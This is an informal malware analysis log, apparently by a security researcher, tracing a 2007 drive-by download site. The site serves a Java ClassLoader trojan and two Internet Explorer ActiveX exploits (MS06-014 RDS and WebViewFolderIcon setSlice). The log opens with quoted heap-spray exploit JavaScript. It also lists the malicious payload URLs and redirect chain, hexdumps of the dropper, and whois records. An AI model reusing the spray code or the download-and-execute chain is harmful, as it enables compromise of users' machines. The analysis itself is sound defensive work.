	var desrtfgk = bb1852010839ff.length * 2;
	var bb764779104ffSize = rf1033731644mmize - (desrtfgk+0x38);
	var bb764779104ff = unescape("%u0c0c%u0c0c");
	bb764779104ff = getbb764779104ff(bb764779104ff,bb764779104ffSize);
	rf1033731644mm = (AfgsARtg - 0x400000)/rf1033731644mmize;
	memory = new Array();
	for (i=0;i<rf1033731644mm;i++)
	{
		memory[i] = bb764779104ff + bb1852010839ff;
	}
	var gov = '';
	var s = gov;
	s += 0x7ffffffe;
   	for ( i = 0 ; i < 256 ; i++) 
	{
		try{ 
			var g = new ActiveXObject('WebVi'+'ewFol'+gov+'derI'+gov+'con.WebVie'+gov+'wFol'+'derI'+'con.1');
			g.setSlice(s, AfgsARtg, AfgsARtg, AfgsARtg ); 
		}catch(e){}
	}

	function getbb764779104ff(bb764779104ff, bb764779104ffSize)
	{
		while (bb764779104ff.length*2<bb764779104ffSize)
		{
			bb764779104ff += bb764779104ff;
		}
		bb764779104ff = bb764779104ff.substring(0,bb764779104ffSize/2);
		return bb764779104ff;
	}
</script>

************************ there are three exploits here

all these exploits are http download exec (the shellcode downloads something and exec it)

one java and two javascript

the js variables are randomized (to be verified)

************************ urls

the applet call

<applet archive="crtdcghcn.jar" code="BaaaaBaa.class" width=1 height=1>
<param name="url" value="http://www.nownames.org/images/funny.php?adv=3&spl=java"></applet>

url is the executable

<SCRIPT language="javascript">
var url="http://www.nownames.org/images/funny.php?adv=3";

this url will be used by the two javascript explouits

they make basic profiling of the shit 

spl=java
spl=rds the first JS
spl=fi the second JS

profiling is good : ) but this is a poor man solution, use hashes!

************************ the applet

  100  curl -ki "http://www.nownames.org/images/crtdcghcn.jar" > crtdcghcn.jar.0
  101  curl -ki "http://www.nownames.org/images/crtdcghcn.jar" > crtdcghcn.jar.1
  102  curl -ki "http://www.nownames.org/images/crtdcghcn.jar" > crtdcghcn.jar.2

bindiff it

ascii@asciinb ~/hack-nownames.org $ ./bindiff crtdcghcn.jar 

 Poor man BINDIFF - www.ush.it
 Francesco 'ascii' Ongaro - ascii@ush.it


[1/4] Dumping hex objects!
 [ii] Creating hex dump for crtdcghcn.jar.0 ..
 [ii] Creating hex dump for crtdcghcn.jar.1 ..
 [ii] Creating hex dump for crtdcghcn.jar.2 ..
[2/4] Diffing hex objects!
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.0 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.0 ..
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.0 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.1 ..
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.0 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.2 ..
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.1 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.0 ..
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.1 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.1 ..
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.1 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.2 ..
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.2 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.0 ..
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.2 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.1 ..
 [ii] Diffing bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.2 with bindiff_crtdcghcn.jar.dump.crtdcghcn.jar.2 ..
[3/4] Dumping strings objects!
 [ii] Creating strings dump for crtdcghcn.jar.0 ..
 [ii] Creating strings dump for crtdcghcn.jar.1 ..
 [ii] Creating strings dump for crtdcghcn.jar.2 ..
[4/4] Diffing strings objects!
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.0 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.0 ..
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.0 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.1 ..
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.0 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.2 ..
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.1 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.0 ..
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.1 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.1 ..
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.1 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.2 ..
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.2 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.0 ..
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.2 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.1 ..
 [ii] Diffing bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.2 with bindiff_crtdcghcn.jar.strings.crtdcghcn.jar.2 ..

the files are the same over the time, better

strings

BaaaaBaa.class
VaaaaaaaBaa.classm
Dvnny.classm
Baaaaa.class
Dex.classmPMO
Dix.classE
Dux.classEV
META-INF/
META-INF/MANIFEST.MFPK
BaaaaBaa.classPK
VaaaaaaaBaa.classPK
Dvnny.classPK
Baaaaa.classPK
Dex.classPK
Dix.classPK
Dux.classPK

okay what is this shit? google

C:\Documents and Settings\Administrator\Dane aplikacji\Sun\Java\Deployment\cache\javapi\v1.0\ja r\crtdcghcn.jar-19258889-65cbcca1.zip »ZIP »VaaaaaaaBaa.class - a variant of Java/ClassLoader trojan

C:\Documents and Settings\Administrator\Dane aplikacji\Sun\Java\Deployment\cache\javapi\v1.0\ja r\crtdcghcn.jar-19258889-65cbcca1.zip »ZIP »BaaaaBaa.class - a variant of Java/ClassLoader trojan

http://forum.idg.pl/index.php?showtopic=61779&pid=594986&st=0&#entry594986

http://www.computer-brain.net/computer/exklusiv-neuer-exploit-nutzt-ms-sicherheitslucken-26.html

okay, it's a variant of Java/ClassLoader trojan

************************ BaaaaBaa.class

todo

************************ the first JS

var bb730023119ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

this is Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) (2)
http://www.milw0rm.com/exploits/2164

{BD96C556-65A3-11D0-983A-00C04FC29E36} is MS06-014 - RDS.DataControl
{BD96C556-65A3-11D0-983A-00C04FC29E36} hahha the guy make a copy and paste :D (have you noticed? the id are the same!)
{AB9BCEDD-EC7E-47E1-9322-D4A210617116} is UNKNOWN  - Business Object Factory
{0006F033-0000-0000-C000-000000000046} is UNKNOWN  - Outlook Data Object
{0006F03A-0000-0000-C000-000000000046} double
{6e32070a-766d-4ee6-879c-dc1fa91d2fc3} is UNKNOWN  - SoftwareDistribution.MicrosoftUpdateWebControl.1
{6414512B-B978-451D-A0D8-FCFDF33E833C} is UNKNOWN  - SoftwareDistribution.WebControl.1
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D} is UNKNOWN  - WMIScriptUtils.WMIObjectBroker2.1
{06723E09-F4C2-43c8-8358-09FCD1DB0766} UNKNOWN  - VsmIDE.DTE
{639F725F-1B2D-4831-A9FD-874847682010} UNKNOWN  - DExplore.AppObj.8.0
{BA018599-1DB3-44f9-83B4-461454C84BF8} UNKNOWN  - VisualStudio.DTE.8.0
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19} UNKNOWN  - Microsoft.DbgClr.DTE.8.0
{E8CCCDDF-CA28-496b-B050-6C07C962476B} UNKNOWN  - VsaIDE.DTE

X [ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
X [ 'UNKNOWN  - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
X [ 'UNKNOWN  - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],
X [ 'UNKNOWN  - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],
X [ 'UNKNOWN  - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],
X [ 'UNKNOWN  - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],
X [ 'UNKNOWN  - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],
X [ 'UNKNOWN  - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],
X [ 'UNKNOWN  - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],
X [ 'UNKNOWN  - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],
X [ 'UNKNOWN  - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],
X [ 'UNKNOWN  - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],
X [ 'UNKNOWN  - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],		

okay this exploit isn't tuned : ) it's copy and paste

************************ the second JS

var g = new ActiveXObject('WebVi'+'ewFol'+gov+'derI'+gov+'con.WebVie'+gov+'wFol'+'derI'+'con.1');
g.setSlice(s, AfgsARtg, AfgsARtg, AfgsARtg ); 

this is  MoBB #18: WebViewFolderIcon setSlice
http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html

************************ funny?

   42  curl http://www.nownames.org/images/funny.php?adv=qw -ki > funny.php.1
   43  curl http://www.nownames.org/images/funny.php?adv=AAA -ki > funny.php.2
   44  curl http://www.nownames.org/images/funny.php?adv=BBBB -ki > funny.php.3
   45  curl http://www.nownames.org/images/funny.php?adv=CCCC -ki > funny.php.4

ascii@asciinb ~/hack-nownames.org $ ./bindiff funny.php 

 Poor man BINDIFF - www.ush.it
 Francesco 'ascii' Ongaro - ascii@ush.it


[1/4] Dumping hex objects!
 [ii] Creating hex dump for funny.php.1 ..
 [ii] Creating hex dump for funny.php.2 ..
 [ii] Creating hex dump for funny.php.3 ..
 [ii] Creating hex dump for funny.php.4 ..
[2/4] Diffing hex objects!
 [ii] Diffing bindiff_funny.php.dump.funny.php.1 with bindiff_funny.php.dump.funny.php.1 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.1 with bindiff_funny.php.dump.funny.php.2 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.1 with bindiff_funny.php.dump.funny.php.3 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.1 with bindiff_funny.php.dump.funny.php.4 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.2 with bindiff_funny.php.dump.funny.php.1 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.2 with bindiff_funny.php.dump.funny.php.2 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.2 with bindiff_funny.php.dump.funny.php.3 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.2 with bindiff_funny.php.dump.funny.php.4 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.3 with bindiff_funny.php.dump.funny.php.1 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.3 with bindiff_funny.php.dump.funny.php.2 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.3 with bindiff_funny.php.dump.funny.php.3 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.3 with bindiff_funny.php.dump.funny.php.4 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.4 with bindiff_funny.php.dump.funny.php.1 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.4 with bindiff_funny.php.dump.funny.php.2 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.4 with bindiff_funny.php.dump.funny.php.3 ..
 [ii] Diffing bindiff_funny.php.dump.funny.php.4 with bindiff_funny.php.dump.funny.php.4 ..
[3/4] Dumping strings objects!
 [ii] Creating strings dump for funny.php.1 ..
 [ii] Creating strings dump for funny.php.2 ..
 [ii] Creating strings dump for funny.php.3 ..
 [ii] Creating strings dump for funny.php.4 ..
[4/4] Diffing strings objects!
 [ii] Diffing bindiff_funny.php.strings.funny.php.1 with bindiff_funny.php.strings.funny.php.1 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.1 with bindiff_funny.php.strings.funny.php.2 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.1 with bindiff_funny.php.strings.funny.php.3 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.1 with bindiff_funny.php.strings.funny.php.4 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.2 with bindiff_funny.php.strings.funny.php.1 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.2 with bindiff_funny.php.strings.funny.php.2 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.2 with bindiff_funny.php.strings.funny.php.3 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.2 with bindiff_funny.php.strings.funny.php.4 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.3 with bindiff_funny.php.strings.funny.php.1 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.3 with bindiff_funny.php.strings.funny.php.2 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.3 with bindiff_funny.php.strings.funny.php.3 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.3 with bindiff_funny.php.strings.funny.php.4 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.4 with bindiff_funny.php.strings.funny.php.1 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.4 with bindiff_funny.php.strings.funny.php.2 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.4 with bindiff_funny.php.strings.funny.php.3 ..
 [ii] Diffing bindiff_funny.php.strings.funny.php.4 with bindiff_funny.php.strings.funny.php.4 ..

they are the same

ascii@asciinb ~/hack-nownames.org $ ./bindiff funny-java.php 

 Poor man BINDIFF - www.ush.it
 Francesco 'ascii' Ongaro - ascii@ush.it


[1/4] Dumping hex objects!
 [ii] Creating hex dump for funny-java.php.1 ..
 [ii] Creating hex dump for funny-java.php.2 ..
 [ii] Creating hex dump for funny-java.php.3 ..
 [ii] Creating hex dump for funny-java.php.4 ..
 [ii] Creating hex dump for funny-java.php.5 ..
 [ii] Creating hex dump for funny-java.php.6 ..
[2/4] Diffing hex objects!
 [ii] Diffing bindiff_funny-java.php.dump.funny-java.php.1 with bindiff_funny-java.php.dump.funny-java.php.1 ..
[cut..]

they are the same too

  212  cp funny-java.php.6 funny-test.php.6
  213  cp funny.php.1 funny-test.php.1
  214  ./bindiff funny-test.php

they are the same too

so the adv parameter is for stats only

************************ bin files (funny)

000011a0  00 00 00 00 00 00 00 4b  d3 91 49 a1 80 91 42 83  |.......K..I...B.|
000011b0  b6 33 28 36 6b 90 97 0d  4c e3 5c c9 0d 1f 4c 89  |.3(6k...L.\...L.|
000011c0  7c da a1 b7 8c ee 7c 4d  00 79 00 31 00 73 00 74  ||.....|M.y.1.s.t|
000011d0  00 4a 00 6f 00 62 00 00  00 00 00 5c 00 77 00 73  |.J.o.b.....\.w.s|
000011e0  00 32 00 35 00 2e 00 65  00 78 00 65 00 00 00 68  |.2.5...e.x.e...h|
000011f0  00 74 00 74 00 70 00 3a  00 2f 00 2f 00 77 00 77  |.t.t.p.:././.w.w|
00001200  00 77 00 2e 00 6e 00 6f  00 77 00 6e 00 61 00 6d  |.w...n.o.w.n.a.m|
00001210  00 65 00 73 00 2e 00 6f  00 72 00 67 00 2f 00 77  |.e.s...o.r.g./.w|
00001220  00 65 00 6c 00 64 00 65  00 64 00 2f 00 67 00 65  |.e.l.d.e.d./.g.e|
00001230  00 74 00 5f 00 65 00 78  00 65 00 2e 00 70 00 68  |.t._.e.x.e...p.h|
00001240  00 70 00 3f 00 6c 00 3d  00 00 00 00 00 00 00 00  |.p.?.l.=........|
00001250  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

M.y.1.s.t.J.o.b.....\.w.s.2.5...e.x.e...h.t.t.p.:././.w.w.w...n.o.w.n.a.m.e.s...o.r.g./.w.e.l.d.e.d./.g.e.t._.e.x.e...p.h.p.?.l.=.

My1stJob..\ws25.exe.http://www.nownames.org/welded/get_exe.php?l=

000012b0  00 00 00 00 00 00 00 5c  77 73 32 35 2e 65 78 65  |.......\ws25.exe|
000012c0  00 00 00 61 6e 74 69 6b  69 73 6b 61 00 00 00 5c  |...antikiska...\|
000012d0  64 65 6c 73 65 6c 66 2e  62 61 74 00 00 00 00 40  |delself.bat....@|
000012e0  65 63 68 6f 20 6f 66 66  0a 3a 74 72 79 0a 64 65  |echo off.:try.de|
000012f0  6c 20 22 00 00 00 00 22  0a 69 66 20 65 78 69 73  |l "....".if exis|
00001300  74 20 22 00 00 00 00 22  20 67 6f 74 6f 20 74 72  |t "...." goto tr|
00001310  79 0a 00 64 65 6c 20 22  00 00 00 22 00 00 00 01  |y..del "..."....|
00001320  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

************************ anal (funny)

  234  rec funny-test.php.6 
  236  nano funny-test.php.rec

it copies itself in the system directory
it executes itself
it write to disk delself.bat

************************ get_exe.php

   86  hexdump -C funny.php.1 | less
   90  curl -ki "http://www.nownames.org/welded/get_exe.php?l=sd" > get_exe.php.1
   91  curl -ki "http://www.nownames.org/welded/get_exe.php?l=AAAA" > get_exe.php.2
   92  curl -ki "http://www.nownames.org/welded/get_exe.php?l=BBBB" > get_exe.php.3
   93  curl -ki "http://www.nownames.org/welded/get_exe.php?l='" > get_exe.php.4
   94  curl -ki "http://www.nownames.org/welded/get_exe.php" > get_exe.php.5
   95  history > get_exe.php.history

./bindiff get_exe.php

okay they are the same

they send us to

HTTP/1.1 302 Found
Date: Fri, 05 Jan 2007 02:59:38 GMT
Server: Apache/1.3.37 (Unix) mod_ipdrop/0.01 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9$
X-Powered-By: PHP/4.4.4
Location: http://www.the0count.com/serv.exe
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

http://www.the0count.com/serv.exe

prot! an other domain : )

************************ whois?

The Data in Web Commerce Communications Limited ("WEBCC")'s WHOIS database 
is provided by WEBCC for information purposes, and to assist in obtaining 
information about or related to a domain name registration record. WEBCC 
does not guarantee its accuracy. By submitting a WHOIS query, you agree 
that you will use this Data only for lawful purposes and that, under no 
circumstances will you use this Data to:

(1) allow, enable, or otherwise support the transmission of mass unsolicited, 
    commercial advertising or solicitations via e-mail (spam).
(2) enable high volume, automated, electronic processes that apply to WEBCC 
    (or its systems).

The compilation, repackaging, dissemination or other use of this Data is 
expressly prohibited without the prior written consent of WEBCC. WEBCC 
reserves the right to terminate your access to the WEBCC WHOIS database in 
its sole discretion, including without limitation, for excessive querying 
of the WHOIS database or for failure to otherwise abide by this policy. 
WEBCC reserves the right to modify these terms at any time.


Domain: the0count.com
Status: Protected

DNS:
	ns1.hongkong-servers.com
	ns2.hongkong-servers.com

Created: 2006-11-01
Expires: 2007-11-02
Last Modified: 2006-11-02 06:15:07

Registrant Contact:
	Katz Global Domain Name Registration
	Privacy Protected Domain Katz Global Domain Name Trust (domaintrust@katzglobal.com)
	32 Maxwell Road #03-07 c/o the0count.com
	Singapore, SC, sg 069115
	P: +65.67228356	 F: +65.67258021

Administrative Contact:
	Katz Global Domain Name Registration
	Privacy Protected Domain Katz Global Domain Name Trust (domaintrust@katzglobal.com)
	32 Maxwell Road #03-07 c/o the0count.com
	Singapore, SC, sg 069115
	P: +65.67228356	 F: +65.67258021
	
Technical Contact:
	Katz Global Domain Name Registration
	Privacy Protected Domain Katz Global Domain Name Trust (domaintrust@katzglobal.com)
	32 Maxwell Road #03-07 c/o the0count.com
	Singapore, SC, sg 069115
	P: +65.67228356	 F: +65.67258021

Billing Contact:
	Katz Global Domain Name Registration
	Privacy Protected Domain Katz Global Domain Name Trust (domaintrust@katzglobal.com)
	32 Maxwell Road #03-07 c/o the0count.com
	Singapore, SC, sg 069115
	P: +65.67228356	 F: +65.67258021

Whois Record
IP Information 202.157.180.35
Record Type: 	IP Address
IP Location: 	Hong Kong Hong Kong - Katz Global Media
Blacklist Status: 	Clear
Whois Record


inetnum:   202.157.180.26 - 202.157.180.48
netname:   KATZ-GLOBAL-MEDIA
country:   HK
descr:    Katz Global Media
admin-c:   IP6-AP
tech-c:    MH352-AP
status:    ASSIGNED NON-PORTABLE
changed:   Whois Privacy and Spam Prevention by DomainTools.com 20041027
mnt-by:    MAINT-SG-WEBVISIONS
source:    APNIC

person:    Indra Pramana
address:   Webvisions Pte Ltd
address:   75 Science Park Drive
address:   #02-06/08 Cintech II
address:   Singapore Science Park I
address:   Singapore 118255
country:   SG
phone:    +65-6773-9492
fax-no:    +65-6773-9389
e-mail:    Whois Privacy and Spam Prevention by DomainTools.com
nic-hdl:   IP6-AP
mnt-by:    MAINT-SG-WEBVISIONS
changed:   Whois Privacy and Spam Prevention by DomainTools.com 20020719
source:    APNIC

person:    Mohamad Zulkifli Hanafi
nic-hdl:   MH352-AP
e-mail:    Whois Privacy and Spam Prevention by DomainTools.com
address:   75 Science Park Drive
address: #02-06/08 Cintech II
address:   Singapore Science Park I
address:   Singapore 118255
phone:    +65-6773-9550
fax-no:    +65-6773-9389
country:   SG
changed:   Whois Privacy and Spam Prevention by DomainTools.com 20030303
mnt-by:    MAINT-SG-WEBVISIONS
source:    APNIC 

************************ anal (serv)

  248  curl http://www.the0count.com/serv.exe -ki > serv.exe.0
  249  curl http://www.the0count.com/serv.exe -ki > serv.exe.1
  250  curl http://www.the0count.com/serv.exe -ki > serv.exe.2

./bindiff serv.exe

nano serv.exe.1
rec serv.exe.4

umh, i have to stop here : ) no more time
it's 06:21

have a nice day